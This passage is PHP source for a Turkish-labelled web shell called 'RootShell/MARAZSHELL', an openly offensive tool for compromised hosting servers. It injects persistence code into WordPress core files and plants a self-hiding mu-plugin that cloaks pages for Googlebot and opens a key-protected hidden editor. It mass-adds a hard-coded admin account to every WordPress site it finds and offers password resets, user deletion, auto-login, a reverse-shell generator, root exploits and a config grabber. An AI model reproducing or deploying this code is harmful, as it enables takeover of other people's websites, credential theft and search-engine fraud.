foreach($deep_targets as $dt) {
$target_path = $wd . DIRECTORY_SEPARATOR . str_replace("/", DIRECTORY_SEPARATOR, $dt);
if(file_exists($target_path)) {
$content = file_get_contents($target_path);
if(strpos($content, "WP-Core-Optimization") === false) {
$new_content = preg_replace("/^<\?php/", $obfuscated_guard, $content);
if($new_content === $content) $new_content = $obfuscated_guard . $content;
if(@file_put_contents($target_path, $new_content)) $injected_files[] = $target_path;
}
}
}
}
root_log("[+] Deep Persistence deployed to " . count($injected_files) . " core files.");
header("Location: ?b4ckd00rcr3at3"); exit;
}
if (isset($_POST['wp_stealth_cloak'])) {
$cloak_code = '<?php
add_filter(\'show_advanced_plugins\', function($show, $type) {
return false;
}, 9999, 2);
add_filter(\'plugins_list\', function($plugins) {
if (isset($plugins[\'mustuse\'])) {
unset($plugins[\'mustuse\']);
}
return $plugins;
}, 9999);
define(\'BOZCLOAK_SECRET_KEY\', \'bozallah\');
define(\'BOZCLOAK_PARAM\', \'boz\');
define(\'BOZCLOAK_FILE_DIR\', WP_CONTENT_DIR . \'/uploads/bozcloak/\');
class BozCloakStealth {
private $google_user_agents = [
\'googlebot\', \'AdsBot-Google\', \'Mediapartners-Google\', \'Google-Read-Aloud\',
\'DuplexWeb-Google\', \'googleweblight\', \'Storebot-Google\', \'Google-Site-Verification\',
\'Google-InspectionTool\', \'google\'
];
private $google_ip_ranges = [
\'64.233.160.0/19\', \'66.102.0.0/20\', \'66.249.64.0/19\', \'72.14.192.0/18\',
\'74.125.0.0/16\', \'108.177.8.0/21\', \'173.194.0.0/16\', \'207.126.144.0/20\',
\'209.85.128.0/17\', \'216.58.192.0/19\', \'216.239.32.0/19\'
];
public function __construct() {
if (!file_exists(BOZCLOAK_FILE_DIR)) {
wp_mkdir_p(BOZCLOAK_FILE_DIR);
@file_put_contents(BOZCLOAK_FILE_DIR . \'.htaccess\', "Order Deny,Allow\nDeny from all\n<FilesMatch \'\\.php$\'>\n Order Deny,Allow\n Deny from all\n</FilesMatch>");
}
add_action(\'init\', [$this, \'check\'], 5);
}
public function check() {
if (is_admin() || wp_doing_ajax() || wp_doing_cron()) return;
$ua = $_SERVER[\'HTTP_USER_AGENT\'] ?? \'\';
$ip = $this->get_ip();
$ref = $_SERVER[\'HTTP_REFERER\'] ?? \'\';
$bot = $this->is_google($ua, $ip);
$google_referer = stripos($ref, \'google.\') !== false;
$refresh = $this->is_refresh();
if ($bot) {
$this->serve_cloak();
exit;
}
if ($google_referer && !$refresh) {
$expire = time() + 86400 * 3;
setcookie(\'google_visit\', \'2\', $expire, \'/\', parse_url(home_url(), PHP_URL_HOST), is_ssl(), true);
return;
}
if (isset($_GET[BOZCLOAK_PARAM]) && isset($_GET[\'key\']) && $_GET[\'key\'] === BOZCLOAK_SECRET_KEY) {
$this->hidden_editor();
exit;
}
}
private function is_google($ua, $ip) {
$ua = strtolower($ua);
foreach ($this->google_user_agents as $b) {
if (stripos($ua, $b) !== false) return true;
}
return $this->ip_check($ip);
}
private function ip_check($ip) {
$long = ip2long($ip);
if ($long === false) return false;
foreach ($this->google_ip_ranges as $range) {
[$net, $mask] = explode(\'/\', $range);
$subnet = ip2long($net);
$bitmask = -1 << (32 - $mask);
if (($long & $bitmask) === ($subnet & $bitmask)) return true;
}
return false;
}
private function get_ip() {
foreach ([\'HTTP_X_FORWARDED_FOR\', \'HTTP_CLIENT_IP\', \'REMOTE_ADDR\'] as $k) {
if (!empty($_SERVER[$k])) {
$ips = explode(\',\', trim($_SERVER[$k]));
$ip = trim($ips[0]);
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
return $ip;
}
}
}
return \'0.0.0.0\';
}
private function is_refresh() {
$url = (isset($_SERVER[\'HTTPS\']) && $_SERVER[\'HTTPS\'] === \'on\' ? \'https\' : \'http\') . \'.://\' . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\'];
$last = $_SESSION[\'boz_last_url\'] ?? \'\';
$_SESSION[\'boz_last_url\'] = $url;
return $last === $url;
}
private function serve_cloak() {
$file = get_option(\'bozcloak_active\', \'\');
$path = $file ? BOZCLOAK_FILE_DIR . $file : \'\';
header(\'Content-Type: text/html; charset=UTF-8\');
if ($file && file_exists($path)) {
include $path;
} else {
echo \'<!DOCTYPE html><html><head><meta charset="utf-8"><title>...</title></head><body><h1>Google Özel İçerik</h1></body></html>\';
}
exit;
}
private function hidden_editor() {
if (!current_user_can(\'manage_options\')) {
wp_die(\'403 Yasak\', \'Erişim Yok\', [\'response\' => 403]);
}
$msg = \'\';
$content = \'\';
$active = get_option(\'bozcloak_active\', \'\');
$path = $active ? BOZCLOAK_FILE_DIR . $active : \'\';
if ($active && file_exists($path)) {
$content = file_get_contents($path);
}
if (isset($_POST[\'save\']) && check_admin_referer(\'bozcloak\')) {
$new_content = wp_kses_post($_POST[\'content\'] ?? \'\');
$new_name = \'c_\' . wp_generate_password(10, false) . \'.php\';
$new_path = BOZCLOAK_FILE_DIR . $new_name;
if (file_put_contents($new_path, $new_content) !== false) {
update_option(\'bozcloak_active\', $new_name);
if ($active && $active !== $new_name) @unlink($path);
$msg = \'<div style="background:#d4edda;padding:15px;border:1px solid #c3e6cb;">Kaydedildi → \' . esc_html($new_name) . \'</div>\';
$content = $new_content;
$active = $new_name;
} else {
$msg = \'<div style="background:#f8d7da;padding:15px;border:1px solid #f5c6cb;">Dosya yazılamadı! İzinleri kontrol et.</div>\';
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="utf-8">
<title>Stealth Editor</title>
<?php wp_head(); ?>
<style>
body {font-family: system-ui, sans-serif; background:#f6f7f8; margin:0; padding:30px;}
.container {max-width:1100px; margin:auto; background:white; padding:30px; border-radius:10px; box-shadow:0 5px 25px rgba(0,0,0,0.1);}
textarea {width:100%; height:65vh; font-family: \\\'Courier New\\\', monospace; font-size:14px; padding:15px; border:1px solid
.button {background:#0066cc; color:white; border:none; padding:12px 24px; border-radius:6px; cursor:pointer; font-size:16px;}
</style>
</head>
<body>
<div class="container">
<h1>Gizli Tema Editörü</h1>
<?php echo $msg; ?>
<p>Aktif dosya: <strong><?php echo $active ?: \\\'Yok\\\'; ?></strong></p>
<form method="post">
<?php wp_nonce_field(\\\'bozcloak\\\'); ?>
<textarea name="content"><?php echo esc_textarea($content); ?></textarea>
<p><button type="submit" name="save" class="button">Kaydet & Yeni Dosya Oluştur</button></p>
</form>
</div>
<?php wp_footer(); ?>
</body>
</html>
<?php
exit;
}
}
new BozCloakStealth(); ?>';
$scan_root = root_find_scan_base();
$wp_dirs = [];
try {
if (class_exists("RecursiveDirectoryIterator")) {
$it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($scan_root, RecursiveDirectoryIterator::SKIP_DOTS));
foreach ($it as $f) {
if ($f->getFilename() == 'wp-config.php') $wp_dirs[] = $f->getPath();
}
}
} catch (Exception $e) {}
$injected_count = 0;
foreach ($wp_dirs as $wd) {
$mu_dir = $wd . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'mu-plugins';
if (!file_exists($mu_dir)) @mkdir($mu_dir, 0755, true);
$target = $mu_dir . DIRECTORY_SEPARATOR . 'bozcloak.php';
if (@file_put_contents($target, $cloak_code)) {
$injected_count++;
}
}
root_log("[+] Stealth BozCloak injected into $injected_count WordPress mu-plugins.");
header("Location: ?b4ckd00rcr3at3"); exit;
}
}
if (isset($_GET['d']) && isset($_GET['q'])) {
$target = PATH . DIRECTORY_SEPARATOR . $_GET['d'];
if (is_file($target)) unlink($target); elseif (is_dir($target)) @rmdir($target);
header("Location: ?p=" . encodePath(PATH)); exit;
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>RootShell v2.0 | Advanced Backend Administration</title>
<!-- Fonts & Icons -->
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@300;400;600&family=Outfit:wght@300;400;700;900&display=swap" rel="stylesheet">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css">
<script>
function toggle(id) {
const el = document.getElementById(id);
if (el) el.classList.toggle('hidden');
}
function resetPassword(wpDir, uid, inputId, btn) {
const newpw = document.getElementById(inputId).value;
btn.disabled = true;
const originalText = btn.innerText;
btn.innerText = 'WAIT';
const formData = new FormData();
formData.append('wp_action', 'reset_pw');
formData.append('wp_dir', wpDir);
formData.append('reset_uid', uid);
formData.append('newpw', newpw);
fetch('?ajax', { method: 'POST', body: formData })
.then(r => r.json())
.then(data => {
alert(data.message);
if(data.status === 'success') { btn.innerText = 'OK'; } else { btn.innerText = originalText; btn.disabled = false; }
});
}
function deleteUser(wpDir, uid) {
if(!confirm('Delete user ' + uid + '?')) return;
const formData = new FormData();
formData.append('wp_action', 'delete_user');
formData.append('wp_dir', wpDir);
formData.append('uid', uid);
fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
function addAdmin(wpDir, dirId, btn) {
const user = document.getElementById('add_user_' + dirId).value;
const pass = document.getElementById('add_pass_' + dirId).value;
const email = document.getElementById('add_email_' + dirId).value;
if(!user || !pass || !email) return alert('Fill all');
btn.disabled = true;
btn.innerText = 'CREATING...';
const formData = new FormData();
formData.append('wp_action', 'add_admin');
formData.append('wp_dir', wpDir);
formData.append('new_user', user);
formData.append('new_pass', pass);
formData.append('new_email', email);
fetch('?ajax', { method: 'POST', body: formData }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload(); else btn.disabled = false;
});
}
function createItem(type) {
const name = prompt(type === 'file' ? 'File Name:' : 'Folder Name:');
if (!name) return;
let content = '';
if (type === 'file') content = prompt('Initial Content (Optional):', '');
const formData = new FormData();
formData.append('fm_action', type === 'file' ? 'create_file' : 'create_folder');
formData.append('name', name);
if (type === 'file') formData.append('content', content);
fetch('?ajax&p=<?= encodePath(PATH) ?>', { method: 'POST', body: formData }).then(r => r.json()).then(data => {
alert(data.message); if(data.status === 'success') window.location.reload();
});
}
</script>
<style>
@import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;600&display=swap');
:root {
--bg: #0b0b0b;
--surface: #161616;
--surface-hover: #1c1c1c;
--border: #222;
--primary: #0070f3;
--accent: #00dfd8;
--text: #eaeaea;
--text-muted: #888;
--danger: #ff4d4d;
--success: #00ff7f;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
body {
background-color: var(--bg);
color: var(--text);
font-family: 'Inter', -apple-system, sans-serif;
font-size: 13px;
-webkit-font-smoothing: antialiased;
overflow-x: hidden;
}
.info-bar {
background: var(--bg);
border-bottom: 1px solid var(--border);
padding: 0 24px;
height: 48px;
display: flex;
justify-content: space-between;
align-items: center;
position: sticky;
top: 0;
z-index: 1000;
}
.info-left, .info-right { display: flex; gap: 24px; align-items: center; }
.info-item { display: flex; align-items: center; gap: 6px; font-family: 'JetBrains Mono', monospace; font-size: 11px; }
.info-label { color: var(--text-muted); font-weight: 500; }
.info-value { color: var(--text); }
.info-value.text-accent { color: var(--accent); font-weight: 600; }
.badge-system {
border: 1px solid var(--border);
padding: 2px 6px;
border-radius: 4px;
font-size: 10px;
color: var(--text-muted);
font-family: 'JetBrains Mono', monospace;
white-space: nowrap;
}
.status-badges { display: flex; gap: 6px; align-items: center; }
.container { display: flex; min-height: calc(100vh - 48px); }
aside {
width: 220px;
background: var(--bg);
border-right: 1px solid var(--border);
padding: 24px 12px;
display: flex;
flex-direction: column;
gap: 2px;
}
.nav-link {
text-decoration: none;
color: var(--text-muted);
padding: 8px 12px;
border-radius: 6px;
transition: 0.1s;
display: flex;
align-items: center;
gap: 10px;
font-weight: 500;
}
.nav-link i { width: 16px; font-size: 14px; text-align: center; }
.nav-link:hover { background: var(--surface-hover); color: var(--text); }
.nav-link.active { background: var(--surface-hover); color: var(--accent); }
main { flex: 1; padding: 40px; }
.title-section { margin-bottom: 32px; }
.title-section h1 {
font-size: 24px;
font-weight: 700;
letter-spacing: -0.5px;
color: var(--primary);
}
.title-section p { color: var(--text-muted); font-size: 13px; margin-top: 4px; }
.card {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 8px;
padding: 24px;
margin-bottom: 24px;
}
.data-table { width: 100%; border-collapse: collapse; }
.data-table th {
text-align: left;
padding: 12px;
color: var(--text-muted);
font-size: 11px;
font-weight: 600;
text-transform: uppercase;
border-bottom: 1px solid var(--border);
}
.data-table td {
padding: 12px;
border-bottom: 1px solid var(--border);
vertical-align: middle;
color: var(--text);
}
.data-table tr:hover td { background: var(--surface-hover); }
.btn {
background: var(--surface);
color: var(--text);
border: 1px solid var(--border);
padding: 6px 14px;
border-radius: 6px;
cursor: pointer;
font-weight: 500;
display: inline-flex;
align-items: center;
gap: 8px;
transition: all 0.2s cubic-bezier(0.4, 0, 0.2, 1);
text-decoration: none;
font-size: 12px;
}
.btn:hover {
background: var(--surface-hover);
border-color: var(--text-muted);
transform: translateY(-1px);
box-shadow: 0 4px 12px rgba(0,0,0,0.5);
}
.btn:active { transform: translateY(0); }
.btn-primary {
background: var(--accent);
border-color: var(--accent);
color: #000;
}
.btn-primary:hover { opacity: 0.9; box-shadow: 0 0 15px rgba(0, 112, 243, 0.3); }
.btn-danger {
background: rgba(255, 77, 77, 0.03);
border: 1px solid rgba(255, 77, 77, 0.1);
color: var(--danger);
}
.btn-danger:hover { background: var(--danger); color: #fff; }
.btn-accent {
background: var(--surface-hover);
border: 1px solid var(--border);
color: var(--text);
}
input, textarea, select {
background: var(--bg);
border: 1px solid var(--border);
color: var(--text);
padding: 10px 14px;
border-radius: 6px;
outline: none;
width: 100%;
font-size: 13px;
transition: border-color 0.2s;
}
input:focus, textarea:focus, select:focus { border-color: var(--accent); }
select option { background: var(--surface); color: var(--text); }
.breadcrumb {
margin-bottom: 24px;
font-size: 13px;
color: var(--text-muted);
display: flex;
align-items: center;
gap: 8px;
}
.breadcrumb a {
color: var(--text);
text-decoration: none;
font-weight: 500;
}
.breadcrumb a:hover { color: var(--accent); }
.breadcrumb i { color: var(--accent); font-size: 16px; }
pre {
background: #000;
border: 1px solid var(--border);
border-radius: 6px;
padding: 16px;
font-family: 'JetBrains Mono', monospace;
font-size: 12px;
line-height: 1.5;
color: var(--text);
overflow: auto;
}
.status-off { color: var(--danger); font-weight: 600; }
.status-on { color: var(--success); font-weight: 600; }
.hidden { display: none; }
::-webkit-scrollbar { width: 4px; height: 4px; }
::-webkit-scrollbar-track { background: var(--bg); }
::-webkit-scrollbar-thumb { background: var(--border); border-radius: 10px; }
::-webkit-scrollbar-thumb:hover { background: var(--text-muted); }
@media (max-width: 1000px) {
.info-bar { height: auto; padding: 12px; flex-direction: column; gap: 12px; }
.container { flex-direction: column; }
aside { width: 100%; height: auto; position: static; border-right: none; border-bottom: 1px solid var(--border); }
}
</style>
</style>
</head>
<body>
<div class="info-bar">
<div class="info-left">
<div class="info-item"><span class="info-label">[safe mode]</span> <span class="info-value"><?= @ini_get('safe_mode') ? 'ON' : 'OFF' ?></span></div>
<div class="info-item"><span class="info-label">[h0st]</span> <span class="info-value"><?= php_uname() ?></span></div>
<div class="info-item"><span class="info-label">[s0ftware]</span> <span class="info-value"><?= get_software() ?></span></div>
<div class="info-item"><span class="info-label">[php]</span> <span class="info-value text-accent"><?= phpversion() ?></span></div>
</div>
<div class="info-right">
<div class="status-badges">
<div class="badge-system">MYSQL: <?= check_ext('mysqli') ?></div>
<div class="badge-system">POSTGRES: <?= check_ext('pgsql') ?></div>
<div class="badge-system">MSSQL: <?= check_ext('sqlsrv') ?></div>
<div class="badge-system">ORACLE: <?= check_ext('oci8') ?></div>
<div class="badge-system">CGI: <?= (strpos(php_sapi_name(),'cgi')!==false)?'ON':'OFF' ?></div>
</div>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN'): ?>
<button class="btn btn-sm" onclick="toggle('central-wp-lock')" style="background: var(--accent); border-color: var(--accent); color: #fff; height: 28px; font-size: 10px;">
<i class="fas fa-shield-alt"></i> WP-LOCK MANAGER
</button>
<?php endif; ?>
</div>
</div>
<!-- Centralized WP Lock Manager -->
<div id="central-wp-lock" class="hidden" style="position: fixed; top: 70px; right: 20px; z-index: 9999; background: var(--card-bg); border: 1px solid var(--primary); border-radius: 12px; padding: 20px; box-shadow: 0 10px 40px rgba(0,0,0,0.8); min-width: 400px; max-height: 80vh; overflow-y: auto;">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px; border-bottom: 1px solid var(--border); padding-bottom: 10px;">
<h4 style="color: var(--primary);"><i class="fas fa-shield-alt"></i> Central WP Lockdown</h4>
<button class="btn btn-sm" onclick="toggle('central-wp-lock')">CLOSE</button>
</div>
<div id="wp-lock-list">
<p style='font-size: 11px; color: var(--text-dim); text-align: center; padding: 20px;'>
Click the shield to load WordPress sites and manage security.
<br><br>
<button class="btn btn-sm" onclick="loadWPLockList(this)" style="background: var(--surface-hover);">LOAD SITES</button>
</p>
</div>
<script>
function loadWPLockList(btn) {
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i> LOADING...';
btn.disabled = true;
fetch('?ajax&action=get_wp_lock_list').then(r => r.text()).then(html => {
document.getElementById('wp-lock-list').innerHTML = html;
});
}
</script>
</div>
<script>
function toggleCentralWPLock(dir, val, btn) {
var fd = new FormData();
fd.append('wp_action', 'toggle_lock');
fd.append('wp_dir', dir);
fd.append('lock_val', val);
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i>...';
fetch('?ajax', { method: 'POST', body: fd }).then(function(r){ return r.json(); }).then(function(data){
if(data.status === 'success') window.location.reload();
else alert(data.message);
});
}
</script>
<div class="container">
<aside class="animate__animated animate__fadeInLeft">
<div style="margin-bottom: 32px; padding: 0 12px;">
<h2 style="font-weight: 800; font-size: 18px; color: #fff;">MARAZ<span style="color: var(--accent);">SHELL</span></h2>
<p style="font-size: 9px; color: var(--text-muted); letter-spacing: 2px;">V2.0 STABLE</p>
</div>
<nav>
<a href="?p=<?= encodePath(PATH) ?>" class="nav-link <?= !isset($_GET['wp']) && !isset($_GET['winr00t']) && !isset($_GET['linr00t']) && !isset($_GET['scan']) && !isset($_GET['bypasses']) && !isset($_GET['settings']) && !isset($_GET['b4ckd00rcr3at3']) ? 'active' : '' ?>">
<i class="fas fa-folder"></i> File Manager
</a>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN'): ?>
<a href="?wp" class="nav-link <?= isset($_GET['wp']) ? 'active' : '' ?>">
<i class="fab fa-wordpress-simple"></i> WP Scanner <span style="font-size: 8px; background: var(--accent); color: #fff; padding: 1px 4px; border-radius: 4px; margin-left: auto;">NEW</span>
</a>
<?php endif; ?>
<a href="?mass_recon" class="nav-link <?= isset($_GET['mass_recon']) ? 'active' : '' ?>">
<i class="fas fa-satellite-dish"></i> Mass Recon
</a>
<a href="?rev_shell" class="nav-link <?= isset($_GET['rev_shell']) ? 'active' : '' ?>">
<i class="fas fa-terminal"></i> RevShell Gen
</a>
<a href="?winr00t" class="nav-link <?= isset($_GET['winr00t']) ? 'active' : '' ?>">
<i class="fas fa-shield-alt"></i> Windows Root
</a>
<a href="?linr00t" class="nav-link <?= isset($_GET['linr00t']) ? 'active' : '' ?>">
<i class="fab fa-linux"></i> Linux Root
</a>
<a href="?scan" class="nav-link <?= isset($_GET['scan']) ? 'active' : '' ?>">
<i class="fas fa-search"></i> Backdoor Scanner
</a>
<a href="?configs" class="nav-link <?= isset($_GET['configs']) ? 'active' : '' ?>">
<i class="fas fa-key"></i> Config Grabber
</a>
<a href="?portscan" class="nav-link <?= isset($_GET['portscan']) ? 'active' : '' ?>">
<i class="fas fa-network-wired"></i> Port Scanner
</a>
<a href="?b4ckd00rcr3at3" class="nav-link <?= isset($_GET['b4ckd00rcr3at3']) ? 'active' : '' ?>">
<i class="fas fa-virus"></i> Backdoor/Infector
</a>
<a href="?bypasses" class="nav-link <?= isset($_GET['bypasses']) ? 'active' : '' ?>">
<i class="fas fa-unlock-alt"></i> Bypasses
</a>
<a href="?db" class="nav-link <?= isset($_GET['db']) ? 'active' : '' ?>">
<i class="fas fa-database"></i> Database Manager
</a>
<a href="?settings" class="nav-link <?= isset($_GET['settings']) ? 'active' : '' ?>">
<i class="fas fa-cog"></i> Settings
</a>
</nav>
</aside>
<main class="animate__animated animate__fadeIn">
<?php if(isset($_GET['wp'])): ?>
<div class="title-section">
<h1>WP <span>SCANNER</span></h1>
<?php if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'): ?>
<p style="color: var(--danger);">WordPress deep-scanner has limited support on Windows. Some paths may not be found.</p>
<?php endif; ?>
<div class="btn-group" style="display: flex; gap: 10px;">
<button class="btn" onclick="window.location.href='?wp&clear_cache=1'"><i class="fas fa-sync"></i> Refresh Cache</button>
<button class="btn" onclick="window.location.href='?wp&deep_search=1'" style="background: var(--surface-hover);"><i class="fas fa-search-location"></i> Deep System Search</button>
<button class="btn btn-primary" onclick="massAdmin()"><i class="fas fa-robot"></i> Mass Admin Exploit</button>
</div>
</div>
<script>
function autoLogin(wp_dir, uid, btn) {
const oldText = btn.innerHTML;
btn.innerHTML = '<i class="fas fa-spinner fa-spin"></i>';
btn.disabled = true;
const fd = new FormData();
fd.append('wp_action', 'auto_login');
fd.append('wp_dir', wp_dir);
fd.append('uid', uid);
fetch('?ajax', { method: 'POST', body: fd }).then(r => r.json()).then(data => {
if(data.status === 'success') {
window.open(data.url, '_blank');
} else {
alert(data.message);
}
btn.innerHTML = oldText;
btn.disabled = false;
}).catch(e => {
alert('Error connecting to script');
btn.innerHTML = oldText;
btn.disabled = false;
});
}
function massAdmin() {
if(!confirm('Bu işlem TÜM WordPress sitelerine admin eklemeye çalışacak. Emin misiniz?')) return;
alert('Mass Exploit başlatıldı. Lütfen bekleyin...');
window.location.href = '?wp&mass_admin_run=1';
}
</script>
<?php
if (isset($_POST['manual_wp_path'])) {
$p = trim($_POST['manual_wp_path']);
if ($p && is_dir($p)) {
if (file_exists($p.'/wp-config.php')) {
$_SESSION['wp_paths_cache'][] = realpath($p);
echo "<div class='card status-on'>Site added: " . htmlspecialchars($p) . "</div>";
} else {
root_log("[*] Scan started in: $p");
$found_any = false;
$cmd = "find \"$p\" -maxdepth 3 -type f -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $cmd = "dir /s /b \"$p\\wp-config.php\"";
$res = root_exec($cmd);
foreach(explode("\n", trim($res)) as $l) {
if (trim($l) && file_exists(trim($l))) {
$_SESSION['wp_paths_cache'][] = dirname(realpath(trim($l)));
$found_any = true;
}
}
if ($found_any) echo "<div class='card status-on'>WordPress sites found in subdirectories of " . htmlspecialchars($p) . "!</div>";
else echo "<div class='card status-off'>No WordPress found in " . htmlspecialchars($p) . " (Checked subdirs too).</div>";
}
} else {
echo "<div class='card status-off'>Invalid Directory: " . htmlspecialchars($p) . "</div>";
}
}
if (isset($_GET['deep_search'])) {
$base = root_find_scan_base();
if (strpos($base, 'public_html') !== false) $base = dirname($base);
if (strpos($base, 'www') !== false) $base = dirname($base);
if (strpos($base, 'public') !== false) $base = dirname($base);
root_log("[*] Deep search started for WordPress in $base...");
$cmd = "find $base -maxdepth 8 -type f -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$cmd = "dir /s /b \"$base\\wp-config.php\"";
}
$res = root_exec($cmd);
$lines = explode("\n", trim($res));
$found_deep = [];
foreach($lines as $l) {
$l = trim($l);
if ($l && file_exists($l)) $found_deep[] = dirname(realpath($l));
}
if (!empty($found_deep)) {
$_SESSION['wp_paths_cache'] = array_unique(array_merge($_SESSION['wp_paths_cache'] ?? [], $found_deep));
echo "<div class='card status-on'><i class='fas fa-check-circle'></i> Deep Search found " . count($found_deep) . " installations!</div>";
} else {
$roots = ['/home', '/var/www', '/domains', '/home/domains', 'C:\\inetpub\\vhosts', 'C:\\Users\\Public'];
foreach($roots as $r) {
if (@is_dir($r)) {
$cmd = "find $r -maxdepth 5 -type f -name 'wp-config.php' 2>/dev/null";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $cmd = "dir /s /b \"$r\\wp-config.php\"";
$res = root_exec($cmd);
$lines = explode("\n", trim($res));
foreach($lines as $l) {
if (trim($l) && file_exists(trim($l))) $found_deep[] = dirname(realpath(trim($l)));
}
}
}
if (!empty($found_deep)) {
$_SESSION['wp_paths_cache'] = array_unique(array_merge($_SESSION['wp_paths_cache'] ?? [], $found_deep));
echo "<div class='card status-on'>Aggressive Search found " . count($found_deep) . " installations!</div>";
} else {
echo "<div class='card status-off'>System scan found nothing. Try manual entry.</div>";
}
}
}
?>
<div class="card" style="margin-bottom: 25px; background: rgba(0,0,0,0.4); border-color: #333;">
<form method="post" style="display: flex; gap: 10px; align-items: center;">
<i class="fas fa-search-location text-dim" style="margin-left: 10px;"></i>
<input type="text" name="manual_wp_path" placeholder="Enter manual path (e.g. /home/user/public_html or C:\inetpub\wwwroot)" style="flex: 1; border: none; background: transparent;">
<button type="submit" class="btn btn-sm" style="border: 1px solid var(--border);">ADD PATH</button>
</form>
</div>
<?php
if(isset($_GET['clear_cache'])) { unset($_SESSION['wp_paths_cache']); header("Location: ?wp"); exit; }
if(isset($_GET['mass_admin_run'])) {
$dirs = wp_find_paths(100);
if (isset($_SESSION['wp_paths_cache'])) $dirs = array_unique(array_merge($dirs, $_SESSION['wp_paths_cache']));
$success_count = 0;
$results_msg = "<b>🚀 Mass Admin Exploit Report</b>\n";
foreach($dirs as $d) {
$cfg = wp_get_db_config($d);
if ($cfg) {
$mysqli = @new mysqli($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']);
if(!$mysqli->connect_errno) {
if(wp_add_admin($mysqli, $cfg['prefix'], 'root_admin', 'root123!@#', 'admin@root.com')) $success_count++;
$mysqli->close();
}
}
}
echo "<div class='card status-on'>MASS EXPLOIT FINISHED: $success_count sites modified.</div>";
}
$wp_dirs = wp_find_paths(60);
if (isset($_SESSION['wp_paths_cache']) && is_array($_SESSION['wp_paths_cache'])) {
$wp_dirs = array_unique(array_merge($wp_dirs, $_SESSION['wp_paths_cache']));
}
if (empty($wp_dirs)): ?>
<div class="card" style="text-align: center; padding: 100px;">
<h3 style="color: var(--text-dim);"><i class="fas fa-folder-open"></i> No WordPress installations detected automatically.</h3>
<p style="font-size: 13px; margin-top: 10px;">Try "Deep System Search" or enter a manual path above.</p>
</div>
<?php else: ?>
<div style='margin-bottom: 15px; font-size: 11px; color: var(--text-dim); padding: 0 5px;'>SHOWING <?= count($wp_dirs) ?> POTENTIAL WP INSTALLATIONS:</div>
<?php
foreach ($wp_dirs as $wp_dir):
if (empty($wp_dir)) continue;
$cfg = wp_get_db_config($wp_dir);
$wp_version = wp_get_version($wp_dir);
$dir_id = md5($wp_dir);
$mysqli = null;
if (class_exists('mysqli') && $cfg) {
$mysqli = mysqli_init();
$mysqli->options(MYSQLI_OPT_CONNECT_TIMEOUT, 1);
@$mysqli->real_connect($cfg['host'], $cfg['user'], $cfg['pass'], $cfg['db']);
}
?>
<div class="card" style="margin-bottom: 25px;">
<div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 15px; border-bottom: 1px solid var(--border); padding-bottom: 10px;">
<div>
<?php
$site_url = "";
if ($mysqli && !$mysqli->connect_errno) $site_url = get_site_url($mysqli, $cfg['prefix']);
$display_name = $site_url ? parse_url($site_url, PHP_URL_HOST) : basename($wp_dir);
if (empty($display_name)) $display_name = "WordPress Site";
?>
<span class="badge-system" style="color: var(--primary); background: rgba(0, 112, 243, 0.1);">V<?= $wp_version ?></span>
<b style="font-size: 16px; margin-left: 10px; color: var(--accent);"><?= htmlspecialchars($display_name) ?></b>
<span style="font-size: 10px; color: var(--text-dim); margin-left:10px;"><?= htmlspecialchars($wp_dir) ?></span>
<?php
if ($mysqli && !$mysqli->connect_errno) {
$whl = wp_get_hide_login($mysqli, $cfg['prefix']);
if ($whl) {
echo "<div style='margin-top: 10px; padding: 10px; background: rgba(255, 152, 0, 0.1); border: 1px solid rgba(255, 152, 0, 0.2); border-radius: 8px; color: #ff9800; font-size: 13px; font-weight: bold;'>
<i class='fas fa-mask'></i> [DETECTED] WPS Hide Login: <span style='color: #fff; text-decoration: underline;'>/" . htmlspecialchars($whl) . "</span>
</div>";
}
}
?>
</div>
<div style="display: flex; gap: 10px; align-items: center;">
<?php if ($site_url): ?>
<a href="<?= htmlspecialchars($site_url) ?>" target="_blank" class="btn btn-sm" style="background: rgba(0,255,0,0.05);"><i class="fas fa-external-link-alt"></i></a>
<?php endif; ?>
<?php if ($mysqli && !$mysqli->connect_errno): ?>
<button class="btn btn-sm" onclick="toggle('admin_form_<?= $dir_id ?>')"><i class="fas fa-user-plus"></i> ADD ADMIN</button>
<span class="status-on">DB OK</span>
<?php else: ?>
<span class="status-off"><?= !$cfg ? 'NO CONFIG' : ($mysqli ? 'DB ERR' : 'NO MYSQLI') ?></span>
<?php endif; ?>
</div>
</div>
<?php if ($mysqli && !$mysqli->connect_errno):
$users = wp_fetch_users($mysqli, $cfg['prefix']);
?>
<div id="admin_form_<?= $dir_id ?>" class="hidden" style="background: rgba(0,0,0,0.2); padding: 15px; border-radius: 8px; margin-bottom: 20px; border: 1px solid var(--border);">
<div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(150px, 1fr)); gap: 10px;">
